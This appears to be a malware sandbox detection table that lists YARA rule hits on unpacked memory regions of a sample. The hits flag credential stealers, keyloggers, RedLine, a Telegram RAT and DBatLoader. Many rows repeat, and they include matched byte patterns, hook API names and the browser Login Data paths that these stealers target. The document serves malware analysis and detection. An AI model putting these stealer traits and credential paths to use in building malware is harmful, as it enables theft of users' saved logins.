7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.27870000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.27870000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.27870000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.27870000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.27870000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
7.1.jphwmyiA.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.yxU3AgeVTi.exe.22865a8.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
3.2.jphwmyiA.pif.27870000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.27870000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.jphwmyiA.pif.27870000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.27870000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.27870000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.2a120000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
0.2.yxU3AgeVTi.exe.21659f78.11.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.jphwmyiA.pif.2a120000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.2a120000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.2a120000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.2a120000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1e190000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1e190000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1e190000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1e190000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.2.jphwmyiA.pif.25350000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.jphwmyiA.pif.25350000.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.jphwmyiA.pif.25350000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.25350000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.jphwmyiA.pif.25350000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.jphwmyiA.pif.27870000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.2.jphwmyiA.pif.2a120000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1d9f0ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1d9f0ee8.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1d9f0ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1d9f0ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
7.2.jphwmyiA.pif.2a120000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
3.3.jphwmyiA.pif.2352c260.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.jphwmyiA.pif.2352c260.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.3.jphwmyiA.pif.2352c260.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.3.jphwmyiA.pif.2352c260.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
12.1.jphwmyiA.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.27870000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.2.jphwmyiA.pif.27870000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
3.2.jphwmyiA.pif.25350000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
3.2.jphwmyiA.pif.27870000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.jphwmyiA.pif.25350000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.jphwmyiA.pif.25350000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
7.2.jphwmyiA.pif.2a120000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1e190000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
12.2.jphwmyiA.pif.1d9f0ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.3.jphwmyiA.pif.2352c260.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
3.3.jphwmyiA.pif.2352c260.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.3.jphwmyiA.pif.2352c260.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1e190000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1d9f0ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.1d9f0ee8.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.jphwmyiA.pif.25350000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.3.jphwmyiA.pif.2352c260.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
3.2.jphwmyiA.pif.25350000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.jphwmyiA.pif.25350000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.1e190000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.jphwmyiA.pif.27870000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.jphwmyiA.pif.25350000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.jphwmyiA.pif.29f60000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.jphwmyiA.pif.25350000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
